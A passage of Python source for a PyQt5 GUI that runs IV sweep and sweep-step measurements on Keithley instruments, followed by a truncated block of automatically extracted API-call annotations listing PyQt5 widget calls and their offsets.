# Set sweeep paramaters
self.set_step_params(
self.current_step_start.value(),
self.current_step_stop.value(),
self.current_step_npts.value())
# Set keithley as voltage source
if self.keithley(self.step_inst) is not None:
self.keithley(self.step_inst).current_src()
self.keithley(self.step_inst).set_current(0.0)
self.keithley(self.step_inst).voltage_cmp(self.current_step_cmpl.value())
#####################################
# MEASUREMENT EXECUTION THREADS
#
# Function we run when we enter run state
def exec_step_on(self):
# Update UI button to abort
self.step_button.setStyleSheet(
"background-color: #cce6ff; border-style: solid; border-width: 1px; border-color: #1a75ff; padding: 7px;")
# Check if no insturments are initialized
if self.sweep_inst.currentText() == "" and self.step_inst.currentText() == "":
# Message box to warn the user
msg = QMessageBox()
msg.setIcon(QMessageBox.Warning)
msg.setText("No devices initialized")
msg.setWindowTitle("QKeithleySweep")
msg.setWindowIcon(self._icon)
msg.setStandardButtons(QMessageBox.Ok)
msg.exec_()
# Set app meta and revert state
self._set_app_metadata("__exec_step__", False)
self.step_button.click()
# Check if the same insturment is initialized
elif self.sweep_inst.currentText() == self.step_inst.currentText():
# Message box to warn the user
msg = QMessageBox()
msg.setIcon(QMessageBox.Warning)
msg.setText("Same device %s selected for sweep and step parameters. Proceed?"%self.step_inst.currentText())
msg.setWindowTitle("QKeithleySweep")
msg.setWindowIcon(self._icon)
msg.setStandardButtons(QMessageBox.Ok)
msg.setStandardButtons(QMessageBox.Yes | QMessageBox.No)
self.msg_clear = msg.exec_()
# Expose this for testing
if self.msg_clear == QMessageBox.Yes:
self._set_app_metadata("__exec_step__", True)
else:
self._set_app_metadata("__exec_step__", False)
self.step_button.click()
else:
self._set_app_metadata("__exec_step__", True)
# Function we run when we enter run state
def exec_step_off(self):
# Update UI button to abort
self.step_button.setStyleSheet(
"background-color: #dddddd; border-style: solid; border-width: 1px; border-color: #aaaaaa; padding: 7px;" )
self._set_app_metadata("__exec_step__", False)
# Execute Sweep-Step Measurement
def exec_sweep_step_thread(self):
# Generate function pointer for sweep voltage/current mode
if self.sweep_src.currentText() == "Voltage":
__sweep_func__ = self.keithley(self.sweep_inst).set_voltage
__sweep_delay__ = self.voltage_sweep_delay.value()
if self.sweep_src.currentText() == "Current":
__sweep_func__ = self.keithley(self.sweep_inst).set_current
__sweep_delay__ = self.current_sweep_delay.value()
# Clear plot and zero arrays
start = time.time()
# Use generator function so all traces have same color
_c = self.plot.gen_next_color()
_handle_index = 0
# Get data object
data = self._get_data_object()
# Master key
_root = data.add_hash_key("iv-sweep-v-step")
# Set metatata for root
if self.step_src.currentText() == "Voltage":
data.set_metadata(_root, "__type__", "iv-sweep-v-step")
if self.step_src.currentText() == "Current":
data.set_metadata(_root, "__type__", "iv-sweep-v-step")
# Add key to meta widget
self.meta_widget.add_meta_key(_root)
# Create internal data structure for buffers
buffers = {
"__sweep__" : {"inst" : self.sweep_inst, "data" : None},
"__step__" : {"inst" : self.step_inst , "data" : None},
"__plotx__" : None,
"__ploty__" : None
}
# plot-axis insturments
for plot_key, plot_inst in zip(["__plotx__", "__ploty__" ], [ self.plot_x_inst, self.plot_y_inst] ):
if self.sweep_inst.currentText() == plot_inst.currentText():
buffers[ plot_key ] = {"inst" : "__sweep__", "data" : None }
elif self.step_inst.currentText() == plot_inst.currentText():
buffers[ plot_key ] = {"inst" : "__step__", "data" : None }
else:
buffers[ plot_key ] = {"inst" : plot_inst, "data" : None}
# Loop throgh all insurments and enable outputs
for _key, _buffer in buffers.items():
if _buffer["inst"] not in ["__sweep__", "__step__"]:
self.keithley( _buffer["inst"] ).output_on()
# Loop through step variables and generate subkeys
for _step in self._get_app_metadata("__step__"):
# If thread is running
if self.thread_running:
# A hash is generated for each voltage/current step for ease of data processing
# Generate function pointer for step voltage/current mode
if self.step_src.currentText() == "Voltage":
__step_func__ = self.keithley(self.step_inst).set_voltage
# Generate data key and set metadata
data = self._get_data_object()
key = data.add_hash_key("iv-sweep-v-step%s"%_step)
# Add keys and metadata to data object
data.set_metadata(key, "__root__", _root)
data.set_metadata(key, "__step__", _step)
data.set_subkeys(key, ["t", "V0", "I0", "P0", "V1", "I1", "P1"])
# Current Mode
if self.step_src.currentText() == "Current":
__step_func__ = self.keithley(self.step_inst).set_current
key = data.add_hash_key("iv-sweep-i-step%s"%_step)
# Add keys and metadata to data object
data.set_metadata(key, "__root__", _root)
data.set_metadata(key, "__step__", _step)
data.set_subkeys(key, ["t", "V0", "I0", "P0", "V1", "I1", "P1"])
# Set step voltage/current
__step_func__(_step)
# Add axes handle to root
self.plot.add_axes_handle("111", _root, _color=_c)
# Bias settle
if __sweep_delay__ != 0:
time.sleep(__sweep_delay__)
# Loop through sweep variables
for _bias in self._get_app_metadata("__sweep__"):
# If thread is running
if self.thread_running:
# Set voltage/current bias
__sweep_func__(_bias)
# Get data from buffer
# Populate buffers
buffers["__sweep__"]["data"] = self.keithley( buffers["__sweep__"]["inst"] ).meas().split(",")
buffers["__step__"]["data"] = self.keithley( buffers["__step__"]["inst"] ).meas().split(",")
# Plot insturments will copy sweep data or meas() if needed
for plot_buffer in ["__plotx__", "__ploty__"]:
if buffers[plot_buffer]["inst"] == "__sweep__":
buffers[plot_buffer]["data"] = buffers["__sweep__"]["data"]
elif buffers[plot_buffer]["inst"] == "__step__":
buffers[plot_buffer]["data"] = buffers["__step__"]["data"]
else:
buffers[plot_buffer]["data"] = self.keithley( buffers[plot_buffer]["inst"] ).meas().split(",")
# Apply delay
if __sweep_delay__ != 0:
time.sleep(__sweep_delay__)
# Extract data from buffer
_now = float(time.time() - start)
# Append measured values to data arrays
data.append_subkey_data(key,"t", _now )
data.append_subkey_data(key,"V0", float( buffers["__sweep__"]["data"][0]) )
data.append_subkey_data(key,"I0", float( buffers["__sweep__"]["data"][1]) )
data.append_subkey_data(key,"P0", float( buffers["__sweep__"]["data"][0]) * float(buffers["__sweep__"]["data"][1]) )
data.append_subkey_data(key,"V1", float( buffers["__step__"]["data"][0]) )
data.append_subkey_data(key,"I1", float( buffers["__step__"]["data"][1]) )
data.append_subkey_data(key,"P1", float( buffers["__step__"]["data"][0]) * float(buffers["__step__"]["data"][1]) )
# Sync x-axis data
if self.plot_x_data.currentText() == "Voltage":
p0 = buffers["__plotx__"]["data"][0]
if self.plot_x_data.currentText() == "Current":
p0 = buffers["__plotx__"]["data"][1]
# Sync y-axis data
if self.plot_y_data.currentText() == "Voltage":
p1 = buffers["__ploty__"]["data"][0]
if self.plot_y_data.currentText() == "Current":
p1 = buffers["__ploty__"]["data"][1]
# Update the data
self.plot.append_handle_data("111", _root, float(p0), float(p1), _handle_index)
self.plot.update_canvas()
else:
break
# Increment handle index
_handle_index += 1
else:
break
# Reset active keithleys
__sweep_func__(0.0)
__step_func__(0.0)
# Loop throgh all insurments and disable outputs
for _key, _buffer in buffers.items():
if _buffer["inst"] not in ["__sweep__", "__step__"]:
self.keithley( _buffer["inst"] ).output_off()
# Reset sweep control and update measurement state to stop.
# Post a button click event to the QStateMachine to trigger
# a state transition if thread is still running (not aborted)
if self.thread_running:
self.meas_button.click()
# Execute Sweep Measurement
def exec_sweep_thread(self):
# Generate data key
data = self._get_data_object()
key = data.add_hash_key("iv-sweep")
# Add data fields to key
data.set_subkeys(key, ["t", "V", "I", "P"])
data.set_metadata(key, "__type__", "iv-sweep")
# Add key to meta widget
self.meta_widget.add_meta_key(key)
# Generate function pointer for voltage/current mode
if self.sweep_src.currentText() == "Voltage":
__sweep_func__ = self.keithley(self.sweep_inst).set_voltage
__sweep_delay__ = self.voltage_sweep_delay.value()
if self.sweep_src.currentText() == "Current":
__sweep_func__ = self.keithley(self.sweep_inst).set_current
__sweep_delay__ = self.current_sweep_delay.value()
# Clear plot and zero arrays
handle = self.plot.add_axes_handle("111", key)
start = time.time()
# Create internal data structure for buffers
buffers = {
"__sweep__" : {"inst" : self.sweep_inst, "data" : None},
"__plotx__" : None,
"__ploty__" : None
}
# x-axis insturment
for plot_key, plot_inst in zip( ["__plotx__", "__ploty__" ], [self.plot_x_inst, self.plot_y_inst] ):
if self.sweep_inst.currentText() == plot_inst.currentText():
buffers[plot_key] = {"inst" : "__sweep__", "data" : None }
else:
buffers[plot_key] = {"inst" : plot_inst, "data" : None}
# Loop throgh all insurments and enable outputs
for _key, _buffer in buffers.items():
if _buffer["inst"] not in ["__sweep__"]:
self.keithley( _buffer["inst"] ).output_on()
# Loop through sweep variables
for _bias in self._get_app_metadata("__sweep__"):
# If thread is running
if self.thread_running:
# Set voltage/current bias
__sweep_func__(_bias)
# Populate buffers
buffers["__sweep__"]["data"] = self.keithley( buffers["__sweep__"]["inst"] ).meas().split(",")
# Plot insturments will copy sweep data or meas() if needed
for plot_buffer in ["__plotx__", "__ploty__"]:
if buffers[plot_buffer]["inst"] == "__sweep__":
buffers[plot_buffer]["data"] = buffers["__sweep__"]["data"]
else:
buffers[plot_buffer]["data"] = self.keithley( buffers[plot_buffer]["inst"] ).meas().split(",")
if __sweep_delay__ != 0:
time.sleep(__sweep_delay__)
# Extract data from buffer
_now = float(time.time() - start)
# Append measured values to data arrays
data.append_subkey_data(key,"t", _now )
data.append_subkey_data(key,"V", float( buffers["__sweep__"]["data"][0]) )
data.append_subkey_data(key,"I", float( buffers["__sweep__"]["data"][1]) )
data.append_subkey_data(key,"P", float( buffers["__sweep__"]["data"][0]) * float(buffers["__sweep__"]["data"][1]) )
# Sync x-axis data
if self.plot_x_data.currentText() == "Voltage":
p0 = buffers["__plotx__"]["data"][0]
if self.plot_x_data.currentText() == "Current":
p0 = buffers["__plotx__"]["data"][1]
# Sync y-axis data
if self.plot_y_data.currentText() == "Voltage":
p1 = buffers["__ploty__"]["data"][0]
if self.plot_y_data.currentText() == "Current":
p1 = buffers["__ploty__"]["data"][1]
# Update the data
self.plot.append_handle_data("111", key, float(p0), float(p1))
self.plot.update_canvas()
# Reset Keithley
__sweep_func__(0.0)
# Loop throgh all insurments and enable outputs
for _key, _buffer in buffers.items():
if _buffer["inst"] not in ["__sweep__"]:
self.keithley( _buffer["inst"] ).output_off()
# Reset sweep control and update measurement state to stop.
# Post a button click event to the QStateMachine to trigger
# a state transition if thread is still running (not aborted)
if self.thread_running:
self.meas_button.click()
# Function we run when we enter run state
def exec_meas_run(self):
# Update sweep and step params
self.update_meas_params()
# For startup protection
if self.keithley(self.sweep_inst) is not None:
# Update UI button to abort
self.meas_button.setStyleSheet(
"background-color: #ffcccc; border-style: solid; border-width: 1px; border-color: #800000; padding: 7px;")
# Disable controls (sweep)
self.sweep_src.setEnabled(False)
self.sweep_inst.setEnabled(False)
# Disable controls (step)
self.step_src.setEnabled(False)
self.step_inst.setEnabled(False)
self.step_button.setEnabled(False)
# Disable controls (save)
self.save_widget.setEnabled(False)
# Plot contollers (plots)
self.plot.mpl_refresh_setEnabled(False)
self.plot_x_inst.setEnabled(False)
self.plot_x_data.setEnabled(False)
self.plot_y_inst.setEnabled(False)
self.plot_y_data.setEnabled(False)
# Check app meta and run sweep or sweep-step tread
if self._get_app_metadata("__exec_step__") == True:
self.thread = threading.Thread(target=self.exec_sweep_step_thread, args=())
else:
self.thread = threading.Thread(target=self.exec_sweep_thread, args=())
self.thread.daemon = True # Daemonize thread
self.thread.start() # Start the execution
self.thread_running = True
# Function we run when we enter abort state
def exec_meas_stop(self):
# For startup protection
if self.keithley(self.sweep_inst) is not None:
# Update UI button to start state
self.meas_button.setStyleSheet(
"background-color: #dddddd; border-style: solid; border-width: 1px; border-color: #aaaaaa; padding: 7px;" )
# Enable controls (sweep)
self.sweep_src.setEnabled(True)
self.sweep_inst.setEnabled(True)
# Enable controls (step)
self.step_src.setEnabled(True)
self.step_inst.setEnabled(True)
self.step_button.setEnabled(True)
# Enable controls (save)
self.save_widget.setEnabled(True)
# Plot contollers
self.plot.mpl_refresh_setEnabled(True)
self.plot_x_inst.setEnabled(True)
self.plot_x_data.setEnabled(True)
self.plot_y_inst.setEnabled(True)
self.plot_y_data.setEnabled(True)
# Kill measurement thread
self.thread_running = False
self.thread.join() # Waits for thread to complete
| [
"PyQt5.QtWidgets.QMessageBox",
"time.sleep",
"PyQt5.QtWidgets.QStackedWidget",
"PyQt5.QtWidgets.QVBoxLayout",
"PyQt5.QtWidgets.QComboBox",
"numpy.where",
"PyQt5.QtWidgets.QLabel",
"PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector",
"numpy.concatenate",
"PyQt5.QtWidgets.QPushButton",
"PyQt5.Q... | [((5102, 5115), 'PyQt5.QtWidgets.QHBoxLayout', 'QHBoxLayout', ([], {}), '()\n', (5113, 5115), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((5533, 5542), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (5540, 5542), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((5569, 5582), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (5580, 5582), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((5799, 5814), 'PyQt5.QtCore.QStateMachine', 'QStateMachine', ([], {}), '()\n', (5812, 5814), False, 'from PyQt5.QtCore import Qt, QStateMachine, QState, QObject\n'), ((5836, 5849), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ([], {}), '()\n', (5847, 5849), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((6046, 6054), 'PyQt5.QtCore.QState', 'QState', ([], {}), '()\n', (6052, 6054), False, 'from PyQt5.QtCore import Qt, QStateMachine, QState, QObject\n'), ((6074, 6082), 'PyQt5.QtCore.QState', 'QState', ([], {}), '()\n', (6080, 6082), False, 'from PyQt5.QtCore import Qt, QStateMachine, QState, QObject\n'), ((6778, 6794), 'PyQt5.QtWidgets.QStackedWidget', 'QStackedWidget', ([], {}), '()\n', (6792, 6794), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((7012, 7046), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""<b>Trace Description</b>"""'], {}), "('<b>Trace Description</b>')\n", (7018, 7046), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((7846, 7855), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (7853, 7855), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((7884, 7897), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (7895, 7897), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((7963, 8000), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""<b>Configure Parameters</b>"""'], {}), "('<b>Configure Parameters</b>')\n", (7969, 8000), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((8027, 8038), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (8036, 8038), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((8636, 8645), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (8643, 8645), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((8673, 8686), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (8684, 8686), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((8739, 8775), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""<b>IV-sweep Parameters</b>"""'], {}), "('<b>IV-sweep Parameters</b>')\n", (8745, 8775), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((8913, 8936), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Select Device"""'], {}), "('Select Device')\n", (8919, 8936), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((9162, 9182), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Sweep Type"""'], {}), "('Sweep Type')\n", (9168, 9182), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((9202, 9213), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (9211, 9213), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((9564, 9580), 'PyQt5.QtWidgets.QStackedWidget', 'QStackedWidget', ([], {}), '()\n', (9578, 9580), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((9765, 9790), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Hysteresis Mode"""'], {}), "('Hysteresis Mode')\n", (9771, 9790), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((9811, 9822), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (9820, 9822), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((10605, 10614), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (10612, 10614), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((10641, 10654), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (10652, 10654), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((10704, 10738), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""<b>V-step Parameters</b>"""'], {}), "('<b>V-step Parameters</b>')\n", (10710, 10738), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((10804, 10827), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Select Device"""'], {}), "('Select Device')\n", (10810, 10827), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((10965, 10984), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Step Type"""'], {}), "('Step Type')\n", (10971, 10984), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((11003, 11014), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (11012, 11014), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((11372, 11388), 'PyQt5.QtWidgets.QStackedWidget', 'QStackedWidget', ([], {}), '()\n', (11386, 11388), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((11573, 11588), 'PyQt5.QtCore.QStateMachine', 'QStateMachine', ([], {}), '()\n', (11586, 11588), False, 'from PyQt5.QtCore import Qt, QStateMachine, QState, QObject\n'), ((11610, 11623), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ([], {}), '()\n', (11621, 11623), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((11818, 11826), 'PyQt5.QtCore.QState', 'QState', ([], {}), '()\n', (11824, 11826), False, 'from PyQt5.QtCore import Qt, QStateMachine, QState, QObject\n'), ((11845, 11853), 'PyQt5.QtCore.QState', 'QState', ([], {}), '()\n', (11851, 11853), False, 'from PyQt5.QtCore import Qt, QStateMachine, QState, QObject\n'), ((13091, 13100), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (13098, 13100), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((13127, 13140), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (13138, 13140), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((13207, 13240), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""<b>Configure x-axis</b>"""'], {}), "('<b>Configure x-axis</b>')\n", (13213, 13240), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((13400, 13411), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (13409, 13411), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((13640, 13673), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""<b>Configure y-axis</b>"""'], {}), "('<b>Configure y-axis</b>')\n", (13646, 13673), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((13833, 13844), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (13842, 13844), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((14632, 14641), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (14639, 14641), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((14672, 14685), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (14683, 14685), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((14931, 14999), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_sweep_start_config'], {}), '(self.voltage_sweep_start_config)\n', (14966, 14999), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((15240, 15307), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_sweep_stop_config'], {}), '(self.voltage_sweep_stop_config)\n', (15275, 15307), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((15559, 15626), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_sweep_cmpl_config'], {}), '(self.voltage_sweep_cmpl_config)\n', (15594, 15626), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((15839, 15906), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_sweep_npts_config'], {}), '(self.voltage_sweep_npts_config)\n', (15874, 15906), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((16136, 16204), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_sweep_delay_config'], {}), '(self.voltage_sweep_delay_config)\n', (16171, 16204), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((16793, 16802), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (16800, 16802), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((16833, 16846), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (16844, 16846), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((17092, 17160), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_sweep_start_config'], {}), '(self.current_sweep_start_config)\n', (17127, 17160), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((17401, 17468), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_sweep_stop_config'], {}), '(self.current_sweep_stop_config)\n', (17436, 17468), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((17717, 17784), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_sweep_cmpl_config'], {}), '(self.current_sweep_cmpl_config)\n', (17752, 17784), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((17996, 18063), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_sweep_npts_config'], {}), '(self.current_sweep_npts_config)\n', (18031, 18063), False, 'from PyQtVisa.widgets import 